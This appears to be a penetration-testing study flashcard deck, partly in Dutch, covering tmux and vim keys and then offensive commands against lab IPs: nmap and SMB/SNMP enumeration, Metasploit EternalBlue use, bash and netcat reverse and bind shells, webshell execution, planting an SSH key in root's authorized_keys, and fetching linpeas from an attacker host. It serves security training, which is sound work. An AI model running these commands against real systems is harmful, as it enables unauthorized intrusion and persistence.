Cheat Sheet Flashcards

1
Q

uname -a

A

Geeft kernel en OS informatie van het systeem

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

netstat -rn

A

Toon netwerken die toegankelijk zijn via het VPN

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Wat is de tmux: default prefix

A

ctrl+b

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Wat is de tmux: new window

A

prefix c

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

tmux: switch to window (1)

A

prefix 1

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

tmux: split pane vertically

A

prefix shift+%

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

tmux: split pane horizontally

A

prefix shift+”

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

tmux: switch to the right pane

A

prefix ->

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

tmux: close current pane

A

prefix b+X

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

vim: enter insert mode

A

esc+i

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

vim: back to normal mode

A

esc

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

vim: Cut character

A

x

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

vim: Cut word

A

dw

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

vim: Cut full line

A

dd

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

vim: Copy word

A

yw

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

vim: Copy full line

A

yy

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

vim: Paste

A

p

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

vim: Go to line number 1.

A

:1

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

vim: Write the file ‘i.e. save’

A

:w

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

vim: Quit

A

:q

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

vim: Quit without saving

A

:q!

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

vim: Write and quit

A

:wq

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

Run nmap on an IP

A

nmap 10.129.42.253

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

Run an nmap script scan on an IP

A

nmap -sV -sC -p- 10.129.42.253

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
List various available nmap scripts
locate scripts/citrix
26
Run an nmap script on an IP
nmap --script smb-os-discovery.nse -p445 10.10.10.40
27
Grab banner of an open port
netcat 10.10.10.10 22
28
List SMB Shares
smbclient -N -L \\\\10.129.42.253
29
Connect to an SMB share
smbclient \\\\10.129.42.253\\users
30
Scan SNMP on an IP
snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0
31
Brute force SNMP secret string
onesixtyone -c dict.txt 10.129.42.254
32
Run a directory scan on a website
gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt
33
Run a sub-domain scan on a website
gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt
34
Grab website banner
curl -IL https://www.inlanefreight.com
35
List details about the webserver/certificates
whatweb 10.10.10.121
36
List potential directories in robots.txt
curl 10.10.10.121/robots.txt
37
View page source (in Firefox)
ctrl+U
38
Search for public exploits for a web application
searchsploit openssh 7.2
39
MSF: Start the Metasploit Framework
msfconsole
40
MSF: Search for public exploits in MSF
search exploit eternalblue
41
MSF: Start using an MSF module
use exploit/windows/smb/ms17_010_psexec
42
MSF: Show required options for an MSF module
show options
43
MSF: Set a value for an MSF module option
set RHOSTS 10.10.10.40
44
MSF: Unset value
unset RHOSTS
45
MSF: Test if the target server is vulnerable
check
46
MSF: Run the exploit on the target server is vulnerable
exploit / run
47
Start a nc listener on a local port
nc -lvnp 1234
48
Send a reverse shell from the remote server
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'
49
Another command to send a reverse shell from the remote server
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f
50
Start a bind shell on the remote server
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f
51
Connect to a bind shell started on the remote server
nc 10.10.10.1 1234
52
Upgrade shell TTY (1)
python -c 'import pty; pty.spawn("/bin/bash")'
53
Upgrade shell TTY (2)
ctrl+z then stty raw -echo then fg then enter twice
54
Create a webshell php file
echo "" > /var/www/html/shell.php
55
Execute a command on an uploaded webshell
curl http://SERVER_IP:PORT/shell.php?cmd=id
56
Run linpeas script to enumerate remote server
./linpeas.sh
57
List available sudo privileges
sudo -l
58
Run a command with sudo
sudo -u user /bin/echo Hello World!
59
Switch to root user (if we have access to sudo su)
sudo su -
60
Switch to a user (if we have access to sudo su)
sudo su user -
61
Create a new SSH key
ssh-keygen -f key
62
Add the generated public key to the user
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys
63
SSH to the server with the generated private key
ssh root@10.10.10.10 -i key
64
Start a local webserver
python3 -m http.server 8000
65
Download a file on the remote server from our local machine
wget http://10.10.14.1:8000/linpeas.sh
66
Download a file on the remote server from our local machine
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh
67
Transfer a file to the remote server with scp (requires SSH access)
scp linenum.sh user@remotehost:/tmp/linenum.sh
68
Convert a file to base64
base64 shell -w 0
69
Convert a file from base64 back to its orig
echo f0VMR...SNIO...InmDwU | base64 -d > shell
70
Check the file's md5sum to ensure it converted correctly
md5sum shell